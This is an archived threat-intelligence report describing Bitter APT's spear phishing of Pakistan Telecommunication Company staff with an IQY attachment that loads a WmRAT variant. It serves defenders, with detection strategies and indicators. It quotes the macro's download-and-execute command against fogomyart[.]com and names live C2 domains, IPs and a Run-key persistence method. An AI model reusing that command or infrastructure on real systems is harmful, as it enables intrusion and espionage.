{ "id": "c7177c96-99c4-418f-8fb5-a9089d7a5a65", "created_at": "2026-04-06T00:10:53.227463Z", "updated_at": "2026-04-10T03:37:58.800866Z", "deleted_at": null, "sha1_hash": "f888162d59d3ce6d321ba37c4c76e25548189111", "title": "Pakistan Telecommunication Company (PTCL) Targeted by Bitter APT During Heightened Regional Conflict", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1485491, "plain_text": "Pakistan Telecommunication Company (PTCL) Targeted by Bitter\r\nAPT During Heightened Regional Conflict\r\nArchived: 2026-04-05 15:34:28 UTC\r\nExecutive Summary\r\nOn May 7, 2025, during the active military escalation between Pakistan and India—specifically in the context of\r\nIndia's military campaign 'Operation Sindoor'—, EclecticIQ analysts observed that Bitter APT (also known as TA397)\r\n[1] very likely targeted the Pakistan Telecommunication Company Limited (PTCL) workers [2] in a spear phishing\r\ncampaign very likely to deliver malware. Analysts assess that, Bitter APT is very likely a South Asian state-sponsored\r\nactor, conducting cyber-enable espionage operations by stealing state and trade secrets.\r\nEclecticIQ and Hudson Rock researchers assess that Bitter APT very likely used stolen email credentials from\r\nPakistan’s Counter Terrorism Department (CTD) to carry out the attack. The spear phishing campaign targeted PTCL\r\npersonnel in critical roles, including 5G infrastructure engineers, DevOps specialists, project managers, and satellite\r\ncommunication experts.\r\nFigure 1 - EclecticIQ Threat Intelligence Platform (TIP) graph view.\r\nThe malicious email [3], received on Wednesday, May 7, 2025, at 12:09 PM, contained an Internet Query (IQY)\r\nattachment with a malicious Excel macro [4]. This macro used the Windows command line (CMD) to download and\r\nexecute a variant of WmRAT [5]. Upon file execution, the attackers established a connection to a command and\r\ncontrol domain, previously linked to Bitter APT, which resolved to a known associated IP address [6].\r\nThe timing of the email, coinciding with reported military confrontations between India and Pakistan, is likely an\r\nattempt to target Pakistan’s telecommunications sector during a period of regional tension. This timing aligns with\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 1 of 10\n\nBitter APT’s established pattern of strategic intelligence gathering through cyber-enabled espionage.\r\nNation State APTs Leveraging Infostealers for Cyber Enabled Espionage Operations\r\nAccording to data from Hudson Rock, initial access to the Counter Terrorism Department (CTD) email account at\r\nIslamabad Police Headquarters (ctd@islamabadpolice.gov.pk) was very likely obtained using compromised\r\ncredentials. These credentials originated from a Pakistani machine infected with a StealC infostealer variant and were\r\nfirst observed on August 13th, 2024.\r\nFigure 2 - Hudson Rock platform showing infostealer logs.\r\nCookies recovered from the infected machine indicate that StealC infostealer was delivered after the user downloaded\r\n“cracked” software on the same day as the infection.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 2 of 10\n\nFigure 3 – Hudson Rock platform showing evidence of infostealer installation on CTD employee device.\r\nThe compromised CTD employee had experienced four previous infostealer infections between 2022 and 2024. The\r\nmost recent infection in August 2024 resulted in the exposure of the critical webmail credentials subsequently\r\nleveraged in the May 2025 campaign.\r\nFigure 4 - Hudson Rock platform showing infection chain in timeline; indicating active compromise since 2022.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 3 of 10\n\nThe compromise of the CTD’s email account provided threat actors with prolonged, privileged access to a critical\r\nPakistani law enforcement system. This persistent foothold allowed actors to monitor communications and, during the\r\nIndia-Pakistan conflict, leverage the compromised account to craft a convincing spear phishing email.\r\nAbuse of IQY Extension in Windows Leads to WmRAT\r\nThreat actors leveraged the IQY file extension in an email attachment named “Security Brief Report.iqy” as part of\r\nthe social engineering lure, designed to appear legitimate and create an urgency to open.\r\nFigure 5 - Spear phishing email sent from compromised Pakistan Counter Terrorism Department (CTD), targeting\r\nPakistan Telecommunication Company.\r\nIQY is a legitimate Microsoft Office file format, very likely leveraged for anti-malware and email gateway evasion\r\npurposes. IQY files can execute Excel formulas capable of triggering system processes such as CMD or LoLBins\r\n(Living-off-the-Land Binaries).\r\nUpon opening the IQY attachment, the victim's system executed an Excel macro with the following command:\r\ncmd|' /c cd C:\\\\programdata \u0026 set /P=\\\"MZ\\\"\u003cnul\u003eb1 \u0026 curl -o b2 https://fogomyart[.]com/vcswin \u0026 copy /b\r\nb1+b2 vcswin.exe \u0026 start /b vcswin.exe'!A0\r\nThis command uses the built-in Windows binary curl.exe to download a malicious BAT script [7] from\r\nfogomyart[.]com/random.php. The script changes the working directory to C:\\ProgramData, creates an executable\r\nheader with the characters MZ - the standard signature for DOS and Windows executables - and then downloads a\r\npayload that is disguised as a PNG image file (vcswin.png) from the same domain.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 4 of 10\n\nFigure 6 - Content of the downloaded BAT file.\r\nThe script reconstructs a valid PE (Portable Executable) file by crafting an MZ header in memory and appending it to\r\nthe binary payload - a common tactic for evasion, as the original file may appear benign without a proper header.\r\nAfter downloading the payload, the script removes the fake PNG header, creating a functional executable (WmRAT\r\nvariant: vcswin.exe) and runs it silently in the background, indicating a clear attempt to execute malicious code while\r\navoiding detection.\r\nCapabilities of WmRAT Variant\r\nEclecticIQ analysts observed that the payload downloaded from fogomyart[.]com/vcswin.png is a new variant of\r\nWmRAT - a remote access trojan designed for intelligence gathering and data exfiltration.\r\nOn December 17,2024, Proofpoint researchers observed Bitter APT used WmRAT to target a Turkish defence-sector\r\norganization [8]. According to reverse engineered sample (vcswin.png), analysts gathered list of WmRAT capabilities:\r\nGathers username and hostname of the victim machine\r\nEnumerates logical drives and directory contents\r\nUploads and downloads files\r\nTakes screenshots of the desktop\r\nRetrieves geolocation information\r\nExecutes commands via CMD or PowerShell\r\nReceives and processes commands from the C2 server\r\nSupports file exfiltration and remote file stream writing\r\nRetrieves file timestamps and disk usage information\r\nWmRAT establishes persistence using the Windows Registry, and launches a secondary process named gentwin.exe\r\nfrom the Roaming directory. This process uses cmd.exe and reg.exe to add a registry key under:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nThe registry entry points to vcswin.exe in C:\\ProgramData. Finally, vcswin.exe is executed, establishing persistence\r\nfor the malware to run on system startup.\r\nCommand and Control Server Embeded Inside WmRAT as XOR Encrypted String\r\nEclecticIQ analysts reverse-engineered the WmRAT variant and discovered that its command-and-control (C2) server\r\nwas hidden within the rdata section of the malware as an XOR-encrypted string.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 5 of 10\n\nFigure 7 - Disassembled WmRAT sample showing XOR encrypted string.\r\nEclecticIQ analysts decrypted the string and revealed the command-and-control (C2) domain\r\ntradesmarkets[.]greenadelhouse[.]com\r\nFigure 8 - Decrypting the XOR encrypted string to obtain cleartext C2 server by using\r\nCyberChef.\r\nPassive DNS data shows that this domain resolved to the following two IP addresses:\r\n185.244.151.84 on April 3, 2025, and\r\n185.244.151.87 on May 7, 2025\r\n185.244.151.84 previously hosted the staging domain jacknwoods[.]com documented by Proofpoint [9] in a\r\nDecember 2024 campaign. Proofpoint attributed this campaign to TA397 (also known as Bitter APT). This overlap in\r\ninfrastructure, along with the consistent use of WmRAT and tactics, strongly supports attribution of the current\r\nactivity to Bitter APT.\r\nEclecticIQ analysts observed that WmRAT communicates with a remote C2 server using HTTP GET requests over\r\nHTTPS (port 443):\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 6 of 10\n\nFigure 9 - C2 communication between victim device and attacker in Wireshark. Showing victim device information\r\nsent to attacker controlled C2 in Base64 encoded format.\r\nThe malware communicates with its C2 server through a URI path designed to blend in with legitimate web traffic:\r\n/excerorderslistoncbook.php. This URI includes a parameter named vrocean that contains Base64-encoded data.\r\nWhen decoded, this parameter reveals victim system identifiers:\r\nBAMUDTK*Admin*Windows10Enterprise\r\nThe string serves as a unique identifier for the infected system. It contains the host name or ID (BAMUDTK), the\r\nuser role (Admin), and the operating system version (Windows10Enterprise). Identifiers help attackers track and\r\nmanage infected hosts within their infrastructure.\r\nTo evade detection and mimic legitimate traffic, the request uses a spoofed User-Agent string: Mozilla/4.0\r\n(compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.30729; .NET CLR 3.5.30729). This User-Agent mimics an outdated Internet Explorer browser on a\r\nWindows system, helping the traffic blend in with common legacy enterprise environments and potentially bypass\r\nbasic network security filters.\r\nOnce this C2 check-in is complete, the malware waits remote commands from the threat actors. These commands are\r\ntypically issued over the same C2 channel and can be executed on the victim machine using either PowerShell or the\r\nWindows command prompt.\r\nThis functionality provides attackers with remote control capabilities, allowing them to execute arbitrary instructions,\r\nfurther compromise the system, or move laterally within the network.\r\nInfostealers to Espionage: Bitter APT Group’s Multi-Stage Cyber Espionage\r\nOperation Against PTCL\r\nBitter APT’s cyber intrusion into Pakistan Telecommunication Company Limited (PTCL) is likely a deliberate\r\nespionage campaign timed with regional conflict. As Pakistan’s largest telecom operator—managing critical services\r\nlike satellite links, fiber-optic backbones, and 5G deployments—PTCL is an obvious high-value target for state-backed actors seeking strategic leverage.\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 7 of 10\n\nBy compromising PTCL engineers, DevOps teams, and satellite specialists, Bitter APT likely aims to gain deeper\r\naccess to Pakistan’s communications infrastructure. Such access enables:\r\nSignals intelligence: Real-time interception of civilian, corporate, and government communications.\r\nNetwork mapping: Identifying routes, interconnects, and vulnerabilities in core telecom infrastructure.\r\nSupply-chain insights: Understanding foreign vendor ties, procurement strategies, and technical dependencies.\r\nConflict preparation: Positioning for sabotage or disruption of telecom services in future crises.\r\nMetadata exploitation: Tracking personnel movements and command tempo via encrypted traffic patterns.\r\nEclecticIQ analysts assess that threat actors are likely pre-positioning for future conflict. By embedding itself within\r\nPTCL during active hostilities, Bitter APT gains a long-term asymmetric advantage: the power to monitor, disrupt in\r\nany future escalation.\r\nDetection Strategies\r\nMonitor for Suspicious IQY File Execution\r\nAlert on .iqy files initiating network activity or spawning processes such as exe, powershell.exe, mshta.exe, or\r\ncurl.exe.\r\nMonitor for Office applications executing child processes (Living-off-the-Land Binaries - LoLBins).\r\nEndpoint and Behavioral Indicators\r\nDetect execution of unusual commands involving curl, copy /b, or appending MZ headers to files in\r\nC:\\ProgramData.\r\nMonitor file creation patterns involving exe and secondary persistence-related binaries like gentwin.exe.\r\nRegistry Persistence Detection\r\nTrack modifications to the Windows Registry path:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nfor entries pointing to non-standard or suspicious executables such as vcswin.exe.\r\nC2 Communication Patterns\r\nDetect outbound HTTPS traffic to suspicious domains (e.g., greenadelhouse[.]com) using encoded parameters\r\nsuch as vrocean.\r\nMonitor HTTP GET requests that mimic legitimate URIs (e.g., /excerorderslistoncbook.php) with Base64-\r\nencoded identifiers.\r\nIndicator of Compromise (IOC)\r\nSpear Phishing Email:\r\n36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590\r\nWmRAT Loader BAT\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 8 of 10\n\nfogomyart[.]com/random.php\r\nde6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed\r\nWmRAT Sample:\r\ngreenadelhouse[.]com\r\nedb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56\r\nMITRE ATT\u0026CK Matrix\r\nReferences\r\n[1]  “BITTER, T-APT-17, Group G1002 | MITRE ATT\u0026CK®.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://attack.mitre.org/groups/G1002/\r\n[2]  “Pakistan’s No. 1 Telecommunication Company - PTCL.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://ptcl.com.pk/\r\n[3]  “VirusTotal - File - 36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/36dbf119cb0cca52aed82ca3e69bbe09d96fa92f2831f8e14dc1bd1b6a5e9590\r\n[4]  “VirusTotal - File - 15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/15db9daa175d506c3e1eaee339eecde8771599ed81adfac48fa99aa5c2322436/detection\r\n[5]  “VirusTotal - File - edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56.” Accessed: May\r\n15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/edb68223db3e583f9a4dd52fd91867fa3c1ce93a98b3c93df3832318fd0a3a56/relations\r\n[6]  “VirusTotal - Domain - tradesmarkets.greenadelhouse.com.” Accessed: May 15, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/domain/tradesmarkets.greenadelhouse.com/relations\r\n[7]  “VirusTotal - File - de6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed.” Accessed:\r\nMay 15, 2025. [Online]. Available:\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 9 of 10\n\nhttps://www.virustotal.com/gui/file/de6b41ab72bfa4114c79464d1083737c6dfa55767339d732db8d2edd462832ed\r\n[8]  “Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US,” Proofpoint.\r\nAccessed: May 20, 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\n[9]  “Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US,” Proofpoint.\r\nAccessed: May 15, 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nSource: https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nhttps://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict" ], "report_names": [ "pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict" ], "threat_actors": [ { "id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b", "created_at": "2022-10-27T08:27:13.133291Z", "updated_at": "2026-04-10T02:00:05.315213Z", "deleted_at": null, "main_name": "BITTER", "aliases": [ "T-APT-17" ], "source_name": "MITRE:BITTER", "tools": [ "ZxxZ" ], "source_id": "MITRE", "reports": null }, { "id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375", "created_at": "2023-01-06T13:46:39.332092Z", "updated_at": "2026-04-10T02:00:03.290017Z", "deleted_at": null, "main_name": "HAZY TIGER", "aliases": [ "T-APT-17", "APT-C-08", "Orange Yali", "TA397" ], "source_name": "MISPGALAXY:HAZY TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bf6cb670-bb69-473f-a220-97ac713fd081", "created_at": "2022-10-25T16:07:23.395205Z", "updated_at": "2026-04-10T02:00:04.578924Z", "deleted_at": null, "main_name": "Bitter", "aliases": [ "G1002", "T-APT-17", "TA397" ], "source_name": "ETDA:Bitter", "tools": [ "Artra Downloader", "ArtraDownloader", "Bitter RAT", "BitterRAT", "Dracarys" ], "source_id": "ETDA", "reports": null }, { "id": "86fd71d3-06dc-4b73-b038-cedea7b83bac", "created_at": "2022-10-25T16:07:23.330793Z", "updated_at": "2026-04-10T02:00:04.545236Z", "deleted_at": null, "main_name": "APT 17", "aliases": [ "APT 17", "ATK 2", "Beijing Group", "Bronze Keystone", "Deputy Dog", "Elderwood", "Elderwood Gang", "G0025", "G0066", "Operation Aurora", "Operation DeputyDog", "Operation Ephemeral Hydra", "Operation RAT Cook", "SIG22", "Sneaky Panda", "TEMP.Avengers", "TG-8153", "Tailgater Team" ], "source_name": "ETDA:APT 17", "tools": [ "9002 RAT", "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "Agent.dhwf", "AngryRebel", "BlackCoffee", "Briba", "Chymine", "Comfoo", "Comfoo RAT", "Darkmoon", "DeputyDog", "Destroy RAT", "DestroyRAT", "Farfli", "Fexel", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Gresim", "HOMEUNIX", "HiKit", "HidraQ", "Homux", "Hydraq", "Jumpall", "Kaba", "Korplug", "Linfo", "MCRAT.A", "McRAT", "MdmBot", "Mdmbot.E", "Moudour", "Mydoor", "Naid", "Nerex", "PCRat", "PNGRAT", "Pasam", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Naid", "Vasport", "Wiarp", "Xamtrav", "Zox", "ZoxPNG", "ZoxRPC", "gresim", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434253, "ts_updated_at": 1775792278, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.pdf", "text": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.txt", "img": "https://archive.orkl.eu/f888162d59d3ce6d321ba37c4c76e25548189111.jpg" } }